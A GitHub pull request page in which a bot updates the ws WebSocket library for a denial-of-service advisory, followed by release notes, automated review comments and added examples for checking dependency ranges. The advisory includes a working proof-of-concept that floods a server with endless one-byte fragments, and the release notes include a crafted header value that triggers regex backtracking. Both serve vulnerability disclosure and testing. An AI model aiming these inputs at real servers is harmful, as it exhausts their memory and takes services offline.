
fix(deps): update dependency ws to v7 [security] #426

Draft
renovate[bot] wants to merge 1 commit into main from renovate/npm-ws-vulnerability


Conversation

@renovate renovate Bot commented Jun 21, 2026


This PR contains the following updates:

Package | Change | Age | Confidence
ws | ^6.2.4 → ^7.0.0 | (badge) | (badge)

ws: Memory exhaustion DoS from tiny fragments and data chunks

CVE-2026-48779 / GHSA-96hv-2xvq-fx4p

Impact

A high volume of exceptionally small fragments and data chunks can be sent by a peer, with modest network traffic, to force the remote peer into allocating and holding structural wrappers that consume far more memory than the default documented message-size limit, leading to process termination due to OOM.

Proof of concept

// The client streams 1-byte frames with fin: false, i.e. fragments of a
// message that never completes. The server keeps every fragment until the
// final one arrives, and the per-fragment bookkeeping costs far more than the
// single payload byte, so the memory held grows well past maxPayload.
import { WebSocket, WebSocketServer } from 'ws';

const wss = new WebSocketServer({ port: 0 }, function () {
  const data = Buffer.alloc(1); // smallest possible payload
  const options = { fin: false }; // never mark the message as finished
  const { port } = wss.address();
  const ws = new WebSocket(`ws://localhost:${port}`);

  ws.on('open', function () {
    // Queue the next fragment as soon as the previous one has been written.
    (function send() {
      ws.send(data, options, function (err) {
        if (err) return;
        send();
      });
    })();
  });

  ws.on('error', console.error);
  ws.on('close', function (code, reason) {
    console.log(`client close - code: ${code} reason: ${reason.toString()}`);
  });
});

wss.on('connection', function (ws) {
  ws.on('error', console.error);
  ws.on('close', function (code, reason) {
    console.log(`server close - code: ${code} reason: ${reason.toString()}`);
  });
});

Patches

The vulnerability was fixed in ws@8.21.0 (websockets/ws@bca91ad) and backported to ws@7.5.11 (websockets/ws@fd36cd8), ws@6.2.4 (websockets/ws@86d3e8a), and ws@5.2.5 (websockets/ws@b5372ac).

Workarounds

In vulnerable versions, the issue can be mitigated by lowering the value of the maxPayload option if possible.

Credits

The vulnerability was responsibly disclosed and fixed by Nadav Magier.

Severity

  • CVSS Score: 7.5 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


Release Notes

websockets/ws (ws)

v7.5.11

Bug fixes

v7.5.10

Bug fixes

v7.5.9

Bug fixes

v7.5.8

Bug fixes

v7.5.7

Bug fixes

v7.5.6

Bug fixes

v7.5.5

Bug fixes

v7.5.4

Bug fixes

v7.5.3

Bug fixes

  • The WebSocketServer constructor now throws an error if more than one of the
    noServer, server, and port options are specified (66e58d2).
  • Fixed a bug where a 'close' event was emitted by a WebSocketServer before
    the internal HTTP/S server was actually closed (5a58730).
  • Fixed a bug that allowed WebSocket connections to be established after
    WebSocketServer.prototype.close() was called (772236a).

v7.5.2

Bug fixes

  • The opening handshake is now aborted if the client receives a
    Sec-WebSocket-Extensions header but no extension was requested or if the
    server indicates an extension not requested by the client (aca94c8).

v7.5.1

Bug fixes

  • Fixed an issue that prevented the connection from being closed properly if an
    error occurred simultaneously on both peers (b434b9f).

v7.5.0

Features

  • Some errors now have a code property describing the specific type of error
    that has occurred (#1901).

Bug fixes

  • A close frame is now sent to the remote peer if an error (such as a data
    framing error) occurs (8806aa9).
  • The close code is now always 1006 if no close frame is received, even if the
    connection is closed due to an error (8806aa9).

v7.4.6

Bug fixes

  • Fixed a ReDoS vulnerability (00c425e).

A specially crafted value of the Sec-Websocket-Protocol header could be used
to significantly slow down a ws server.

// Time the header split on a value that is one long run of spaces with no
// comma; the cost grows quadratically with length because / *, */ backtracks.
for (const length of [1000, 2000, 4000, 8000, 16000, 32000]) {
  const value = 'b' + ' '.repeat(length) + 'x';
  const start = process.hrtime.bigint();

  value.trim().split(/ *, */); // the vulnerable pattern

  const end = process.hrtime.bigint();

  console.log('length = %d, time = %f ns', length, end - start);
}

The vulnerability was responsibly disclosed along with a fix in private by
Robert McLaughlin from University of California, Santa Barbara.

In vulnerable versions of ws, the issue can be mitigated by reducing the maximum
allowed length of the request headers using the --max-http-header-size=size
and/or the maxHeaderSize options.

v7.4.5

Bug fixes

  • UTF-8 validation is now done even if utf-8-validate is not installed
    (23ba6b2).
  • Fixed an edge case where websocket.close() and websocket.terminate() did
    not close the connection (67e25ff).

v7.4.4

Bug fixes

  • Fixed a bug that could cause the process to crash when using the
    permessage-deflate extension (9277437).

v7.4.3

Bug fixes

  • The deflate/inflate stream is now reset instead of reinitialized when context
    takeover is disabled (#1840).

v7.4.2

Bug fixes

  • Silenced a deprecation warning (a2c0d44).

v7.4.1

Bug fixes

  • Added a workaround for a double 'error' event bug in Node.js < 13 which
    caused an uncaught error during the WebSocket handshake (38d6ab3).

v7.4.0

Features

  • The callback of WebSocketServer.prototype.handleUpgrade() now takes the
    client HTTP GET request as second argument (7d39f19).

Bug fixes

  • Read-only properties are now read-only (eabed8f).
  • The CONNECTING, OPEN, CLOSING, CLOSED, binaryType, bufferedAmount,
    extensions, onclose, onerror, onmessage, onopen, protocol,
    readyState, and url properties are now enumerable (2069e68).

v7.3.1

Bug fixes

v7.3.0

Features

  • WebSocket.prototype.addEventListener() now supports the once option (#1754).

v7.2.5

Bug fixes

  • Fixed compatibility with Node.js master (651d662).

v7.2.3

Bug fixes

  • WebSocket#{p{i,o}ng,close}() now throw an error if the data to send is too
    large to fit in a control frame (e54f08d).

v7.2.2

Bug fixes

  • Fixed an issue where calling webSocketStream.end() could cause the process
    to crash (9535702).
  • The connection is now closed if a non-masked frame is received on the server
    or a masked frame is received on the client (#1681).
  • The status code 1014 is now allowed to be used (#1682).

v7.2.1

Bug fixes

  • Added bufferutil and utf-8-validate as peer dependencies (#1626).

v7.2.0

Features

  • Added ability to specify the readableObjectMode option when using
    WebSocket.createWebSocketStream() (#1647).

v7.1.2

Bug fixes

  • Fixed a bug that caused compress jobs to never be marked as complete
    (#1618).

v7.1.1

Bug fixes

  • An error is now thrown if the WebSocket server constructor is used
    incorrectly (3641266).

v7.1.0

Features

  • Added utility to wrap a WebSocket in a Duplex stream (#1589).

Bug fixes

v7.0.1

Bug fixes

  • Added ability to disable sending the SNI extension (#1587).

v7.0.0

Breaking changes

  • Dropped support for Node.js 6 (1e6999b).
  • Dropped support for url.Url instances in the WebSocket constructor
    (692d7b4).
  • The behavior of WebSocket#{p{i,o}ng,send}() has changed when the
    readyState attribute is not OPEN (#1532)
    • If the readyState attribute is CONNECTING, an exception is thrown.
    • If the readyState attribute is CLOSING or CLOSED
      • The bufferedAmount attribute is increased by the length of the data
        argument in bytes.
      • If provided, the callback function is called with an error.
      • No exception is thrown even if the callback function is not provided.

Configuration

📅 Schedule: (UTC)

  • Branch creation
    • At any time (no schedule defined)
  • Automerge
    • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.



This PR was generated by Mend Renovate. View the repository job log.
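
An added example, not code from this PR or from the ws project: it places the Sec-WebSocket-Protocol split quoted in the v7.4.6 release note above beside a linear-time replacement and reproduces the note's timing loop for both parsers. The replacement (split on the literal comma, then trim each token) is my suggestion for illustration, not necessarily the change made in ws commit 00c425e; the header values are constructed.

```javascript
// Added example, not code from the ws project or from this PR.

// Vulnerable form, as quoted in the v7.4.6 release note. The pattern / *, */
// has an unbounded run of spaces on each side of the comma, so on a long run
// of spaces that is never followed by a comma the engine retries the match
// from every space: quadratic backtracking in the header length.
function parseProtocolsRegex(header) {
  return header.trim().split(/ *, */);
}

// Linear-time replacement (a suggestion here, not the exact ws patch): split
// on the literal comma, then trim each token. Neither step can backtrack, so
// the cost is proportional to the header length. String#trim() strips any
// whitespace, not only spaces, so tab-padded tokens are cleaned up as well.
function parseProtocolsLinear(header) {
  return header.split(',').map((token) => token.trim());
}

// Crafted value from the release note: one token, a long run of spaces and no
// comma, so the vulnerable pattern never finds a separator.
function craftedHeader(length) {
  return 'b' + ' '.repeat(length) + 'x';
}

// Wall-clock cost of one call in nanoseconds (BigInt, as in the note).
function timeNs(fn, input) {
  const start = process.hrtime.bigint();
  fn(input);
  return process.hrtime.bigint() - start;
}

// The note's loop, run for both parsers; the rows are returned so a caller can
// inspect them rather than only read them off the console. Default lengths
// stop at 8000 to keep the vulnerable parser from blocking for seconds.
function compareParsers(lengths = [1000, 2000, 4000, 8000]) {
  return lengths.map((length) => {
    const value = craftedHeader(length);
    return {
      length,
      regexNs: timeNs(parseProtocolsRegex, value),
      linearNs: timeNs(parseProtocolsLinear, value),
    };
  });
}

for (const row of compareParsers()) {
  console.log(`length = ${row.length}, regex = ${row.regexNs} ns, linear = ${row.linearNs} ns`);
}
```

Both parsers return the same token list for ordinary header values and for the crafted one; only the time differs, and for the regex form it roughly quadruples each time the length doubles, which is the signature to look for when triaging a suspected ReDoS.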

@renovate renovate Bot added the renovate label Jun 21, 2026

coderabbitai Bot commented Jun 21, 2026


📝 Walkthrough

package.json receives a version constraint update: the ws dependency moves from ^6.2.4 to ^7.0.0.

Estimated code review effort

🎯 1 (Trivial) | ⏱️ ~2 minutes

🚥 Pre-merge checks: 6 passed

  • Title check: Passed. Title accurately describes the main change: updating the ws dependency to v7 for a documented security vulnerability.
  • Docstring Coverage: Passed. No functions found in the changed files to evaluate docstring coverage. Skipping docstring coverage check.
  • Linked Issues check: Passed. Check skipped because no linked issues were found for this pull request.
  • Out of Scope Changes check: Passed. Check skipped because no linked issues were found for this pull request.
  • Updates Docs: Passed. This is a security dependency update (ws vulnerability patch), not a feature implementation. Documentation updates are required for new features, not for transitive dependency maintenance.
  • Description Check: Passed. Check skipped because CodeRabbit's high-level summary is enabled.



coderabbitai Bot previously approved these changes Jun 21, 2026

codecov Bot commented Jun 21, 2026


Codecov Report

✅ All modified and coverable lines are covered by tests.
✅ Project coverage is 0%. Comparing base (aef728e) to head (83f1b92).
✅ All tests successful. No failed tests found.


@renovate renovate Bot force-pushed the renovate/npm-ws-vulnerability branch from 74233d7 to b1eee51 Compare June 23, 2026 06:07
@renovate renovate Bot changed the title chore(deps): update dependency ws to v6.2.4 [security] fix(deps): update dependency ws to v7 [security] Jun 23, 2026

@coderabbitai coderabbitai Bot left a comment


Actionable comments posted: 1

Caution

Some comments are outside the diff and can’t be posted inline due to platform limitations.

⚠️ Outside diff range comments (1)
package.json (1)

2947-2950: 🔒 Security & Privacy | 🔴 Critical

Update ws overrides to v8.21.0 to patch DoS vulnerability (GHSA-96hv-2xvq-fx4p).

Both @deepnote/runtime-core and @jupyterlab/filebrowser override ws to v8.20.1, which is vulnerable to memory exhaustion DoS from tiny fragments and data chunks (CVSS 7.5). The fix is available in v8.21.0. Update both overrides to v8.21.0.

🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.

In `@package.json` around lines 2947 - 2950, The ws package override versions for
both "`@deepnote/runtime-core`" and "`@jupyterlab/filebrowser`" are set to 8.20.1,
which contains a DoS vulnerability. Update the "ws" version string from "8.20.1"
to "8.21.0" for both "`@deepnote/runtime-core`" ws override and
"`@jupyterlab/filebrowser`" ws override to apply the security patch.

📥 Commits

Reviewing files that changed from the base of the PR and between ac66c74 and b1eee51.

⛔ Files ignored due to path filters (1)
  • package-lock.json is excluded by !**/package-lock.json
📒 Files selected for processing (1)
  • package.json

Comment thread package.json
"vscode-languageclient": "^9.0.1",
"vscode-tas-client": "^0.1.84",
"ws": "^6.2.3",
"ws": "^7.0.0",
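Review bot: the new range `^7.0.0` on this line still resolves to any 7.x from 7.0.0 upward, and the advisory quoted above says the fix reached the 7.x line only in 7.5.11, so 7.0.0 through 7.5.10 remain installable; tighten it to `^7.5.11`. package-lock.json is excluded from this review by path filter, so the version actually resolved there should be confirmed separately. Two further points from the page itself: the same advisory lists a backport to 6.2.4, so the major bump is not required for the CVE, and if 7.x is kept the v7.0.0 breaking changes in the release notes apply, in particular that send(), ping() and pong() now throw when readyState is CONNECTING and that Node.js 6 support was dropped. The PR table above also lists the old range as ^6.2.4 while this line shows ^6.2.3, so the table should not be relied on for what was previously installed.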


🔒 Security & Privacy | 🔴 Critical

🧩 Analysis chain

🏁 Script executed:

#!/bin/bash
# Verify ws versions and vulnerability status

# Check available ws versions and identify vulnerable ranges
npm view ws versions --json | jq -r '.[]' | grep -E '^(6\.|7\.|8\.)'

# Check for security advisories
gh api graphql -f query='
{
  securityVulnerabilities(first: 10, ecosystem: NPM, package: "ws") {
    nodes {
      advisory {
        summary
        severity
        identifiers { type value }
      }
      vulnerableVersionRange
      firstPatchedVersion { identifier }
    }
  }
}'

Repository: deepnote/vscode-deepnote

Length of output: 3667


Line 2772 uses vulnerable version range; lines 2947 & 2950 require patched ws version.

Setting ws to ^7.0.0 matches 7.0.0 through 7.5.10, all vulnerable to CVE-2026-48779. Use ^7.5.11 instead.

Additionally, lines 2947 and 2950 pin ws to 8.20.1, which is vulnerable to CVE-2026-48779 (fixed in 8.21.0). Update to 8.21.0 per PR objectives.

🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.

In `@package.json` at line 2772, Update the ws package version specifications to
address CVE-2026-48779 vulnerabilities. Change the ws dependency version range
from ^7.0.0 to ^7.5.11 to ensure the vulnerable versions 7.0.0 through 7.5.10
are not installed. Additionally, locate the two pinned ws version specifications
set to 8.20.1 and update both to 8.21.0, which contains the necessary security
patch for this CVE.
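
An added check, not code from this PR, from Renovate or from CodeRabbit: it scans a package.json object for every `ws` specifier in the dependency maps and in the nested npm `overrides` tree (the two places the review above flags) and reports whether the lowest version each range admits predates the first patched release for that major line, as listed in the advisory's Patches section above. The package.json below is a constructed stand-in for the repository's, reduced to the three specifiers discussed in this thread, and range handling covers only exact pins and caret ranges, the two forms that appear on this page.

```javascript
// Added example, not code from this PR or from the bots that reviewed it.
// First patched release per major line, taken from the advisory's Patches
// section (CVE-2026-48779 / GHSA-96hv-2xvq-fx4p). Majors not listed are
// reported as "no data" (vulnerable: null) rather than guessed.
const FIRST_PATCHED = { 5: '5.2.5', 6: '6.2.4', 7: '7.5.11', 8: '8.21.0' };

function parseVersion(text) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)$/.exec(text.trim());
  if (!m) throw new Error(`unsupported version: ${text}`);
  return [Number(m[1]), Number(m[2]), Number(m[3])];
}

function compareVersions(a, b) {
  for (let i = 0; i < 3; i++) {
    if (a[i] !== b[i]) return a[i] < b[i] ? -1 : 1;
  }
  return 0;
}

// Lowest version a specifier can resolve to. Only the two forms on this page
// are handled: exact pins ("8.20.1") and caret ranges ("^7.0.0"). A caret
// range admits everything from its base up to the next major, so its floor is
// the base version itself; any other syntax is rejected rather than guessed.
function lowestAdmitted(spec) {
  const s = spec.trim();
  if (s.startsWith('^')) return parseVersion(s.slice(1));
  if (/^\d/.test(s)) return parseVersion(s);
  throw new Error(`unsupported range syntax: ${spec}`);
}

// A specifier is unsafe when the floor it admits is older than the first
// patched release of the same major: the resolver may then pick an affected
// version. The suggestion keeps the original form (caret or exact pin).
function assessWsSpec(spec) {
  const floor = lowestAdmitted(spec);
  const patched = FIRST_PATCHED[floor[0]];
  if (!patched) {
    return { spec, floor: floor.join('.'), patched: null, vulnerable: null, suggestion: null };
  }
  const vulnerable = compareVersions(floor, parseVersion(patched)) < 0;
  const suggestion = vulnerable ? (spec.trim().startsWith('^') ? `^${patched}` : patched) : null;
  return { spec, floor: floor.join('.'), patched, vulnerable, suggestion };
}

// Every place package.json can pin ws: the dependency maps and the npm
// "overrides" tree, which nests per-package objects such as
// { "@jupyterlab/filebrowser": { "ws": "8.20.1" } }.
function findWsSpecs(pkg) {
  const found = [];
  for (const field of ['dependencies', 'devDependencies', 'optionalDependencies']) {
    const spec = pkg[field] && pkg[field].ws;
    if (typeof spec === 'string') found.push({ path: `${field}.ws`, spec });
  }
  const walk = (node, path) => {
    for (const [name, value] of Object.entries(node || {})) {
      if (name === 'ws' && typeof value === 'string') found.push({ path: `${path}.ws`, spec: value });
      else if (value && typeof value === 'object') walk(value, `${path}.${name}`);
    }
  };
  walk(pkg.overrides, 'overrides');
  return found;
}

function auditWs(pkg) {
  return findWsSpecs(pkg).map(({ path, spec }) => ({ path, ...assessWsSpec(spec) }));
}

// Constructed stand-in for the repository's package.json, reduced to the
// three ws specifiers this review thread discusses.
const SAMPLE_PACKAGE_JSON = {
  dependencies: { ws: '^7.0.0' },
  overrides: {
    '@deepnote/runtime-core': { ws: '8.20.1' },
    '@jupyterlab/filebrowser': { ws: '8.20.1' },
  },
};

for (const row of auditWs(SAMPLE_PACKAGE_JSON)) {
  console.log(`${row.path}: ${row.spec} floor=${row.floor} vulnerable=${row.vulnerable}` +
    (row.suggestion ? ` -> use ${row.suggestion}` : ''));
}
```

This checks only what package.json allows; the version actually installed is decided by package-lock.json, which this review excluded by path filter, so run `npm ls ws` after the change and compare the resolved versions against the same first-patched table.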

@renovate renovate Bot force-pushed the renovate/npm-ws-vulnerability branch from b1eee51 to 83f1b92 Compare June 23, 2026 15:37